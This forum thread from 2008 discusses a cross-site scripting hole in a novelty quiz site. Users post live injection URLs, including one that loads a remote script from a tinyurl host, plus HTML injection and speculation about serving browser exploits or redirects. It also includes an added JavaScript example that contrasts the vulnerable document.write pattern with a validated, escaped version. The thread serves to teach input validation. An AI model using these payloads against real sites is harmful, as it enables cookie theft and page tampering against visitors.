 How much are you worth?
Aziz




PostPosted: Wed Jul 30, 2008 11:59 am   Post subject: How much are you worth?

I am about $260k. Check it out:

http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=263090

It's been the hit on IRC lately...
Dan




PostPosted: Wed Jul 30, 2008 12:01 pm   Post subject: RE:How much are you worth?

I am worth:
http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=%3Cscript%20src=%22http://tinyurl.com/5a785n%22%3E

Spoiler:

XSS is bad for your cookies.
Do your part in preventing rickroll attacks: parse your input!
Computer Science Canada Help with programming in C, C++, Java, PHP, Ruby, Turing, VB and more!
DemonWasp




PostPosted: Wed Jul 30, 2008 1:33 pm   Post subject: RE:How much are you worth?

@Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar.

I'm apparently worth squat: http://www.howmuchisyoursoulworth.com/results.html?earned_points=71605

(You can rip out the &radioq##=on nonsense and it doesn't have any effect.)
Tony




PostPosted: Wed Jul 30, 2008 3:03 pm   Post subject: RE:How much are you worth?

Page source tells me the max I can be worth is
Quote:

<input id="max_points" value="570000" type="hidden" />
Latest from compsci.ca/blog: Tony's programming blog. DWITE - a programming contest.
DemonWasp




PostPosted: Wed Jul 30, 2008 3:20 pm   Post subject: RE:How much are you worth?

That only applies as long as you don't have Firebug, though, Tony...you can modify the value of hidden inputs (or show them, etc) with the flick of a button.

I sense someone about to post a screen cap of them being worth a million soul bucks.
Aziz




PostPosted: Wed Jul 30, 2008 3:27 pm   Post subject: RE:How much are you worth?

That input has nothing to do with it, though:

http://www.howmuchisyoursoulworth.com/results.html?earned_points=999999999999999999
Tony




PostPosted: Wed Jul 30, 2008 3:29 pm   Post subject: Re: How much are you worth?

Just a million?

http://www.howmuchisyoursoulworth.com/results.html?earned_points=%3Cblink%3EGoogol%3C/blink%3E

Don't even need Firebug to inject arbitrary HTML into the page.

[attachment: Picture 6.png]
DemonWasp




PostPosted: Wed Jul 30, 2008 3:36 pm   Post subject: RE:How much are you worth?

Ah, my bad. I thought the max-value hidden input was on the final page, but clearly not. It clearly doesn't even make an attempt to make sure you entered something valid - strings instead of ints? Come on!

It's great when pages have no validation.
Tony




PostPosted: Wed Jul 30, 2008 5:16 pm   Post subject: RE:How much are you worth?

Not just strings, but full-out HTML. The "number" is rendered by something along the lines of
code:

<script>document.write(whatever_url_argument)</script>

Meaning one could inject their own JavaScript into the page and essentially make that page do whatever they wanted. Which is exactly what Dan has done.
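An added example (not the site's own code, and not from anyone in this thread) of the pattern Tony describes, beside a hardened version. It models the page's rendering as a function that returns the HTML it would write, so both variants can be run offline in Node. The parameter name earned_points and the 570000 ceiling come from the thread; the function names, the sample payload and the script URL in it are assumptions made up for the example.

```javascript
// Added example: reflected/DOM XSS via document.write of a query parameter,
// and a hardened replacement that treats the value as data.
// Assumed names: vulnerableRender, parsePoints, escapeHtml, safeRender.

const MAX_POINTS = 570000; // the hidden max_points value quoted in the thread

// Vulnerable pattern, equivalent to document.write(whatever_url_argument):
// the raw query value becomes markup, so <script>, <blink> etc. are live.
function vulnerableRender(search) {
  const value = new URLSearchParams(search).get("earned_points") ?? "";
  return `<p>Your soul is worth $${value}</p>`;
}

// Hardened step 1: only accept a bounded, all-digit integer.
// Returns the number, or null for anything that is not a valid score.
function parsePoints(raw) {
  if (raw === null || !/^\d{1,7}$/.test(raw)) return null;
  const n = Number(raw);
  return n <= MAX_POINTS ? n : null;
}

// Hardened step 2: anything echoed into HTML is escaped first.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function safeRender(search) {
  const raw = new URLSearchParams(search).get("earned_points");
  const points = parsePoints(raw);
  if (points === null) {
    // Echo the rejected input only as escaped text, so a payload is inert.
    return `<p>Invalid score: ${escapeHtml(raw ?? "")}</p>`;
  }
  return `<p>Your soul is worth $${points}</p>`;
}

// Constructed query string mirroring Dan's link (script URL is a placeholder).
const payload =
  "?earned_points=%3Cscript%20src=%22http://example.invalid/x.js%22%3E";

if (typeof require !== "undefined" && require.main === module) {
  console.log(vulnerableRender(payload)); // <script src=...> lands in the page
  console.log(safeRender(payload));       // &lt;script ...&gt; as harmless text
  console.log(safeRender("?earned_points=263090"));
  console.log(safeRender("?earned_points=999999999999999999"));
}
```

Note that escaping alone would stop the injection, but without the integer check the page would still happily report a "worth" of Googol; validating the type and range fixes both problems DemonWasp and Tony point out.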
LaZ3R




PostPosted: Wed Jul 30, 2008 6:26 pm   Post subject: RE:How much are you worth?

edit: Whoops... posted a really long link and ruined the page horizontally... my bad :D
Dan




PostPosted: Wed Jul 30, 2008 9:11 pm   Post subject: Re: RE:How much are you worth?

DemonWasp @ 30th July 2008, 1:33 pm wrote:
@Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar.


Yes and no. Although this page itself does not have any valuable cookies to steal, I could still inject an exploit for old versions of IE and take out a few IE 6 users, or just redirect to a shock site and piss people off ;) Using JavaScript you could also change any content on the page to give people a false idea of what the page actually says. And if you are really smart you might be able to make the client attack another site.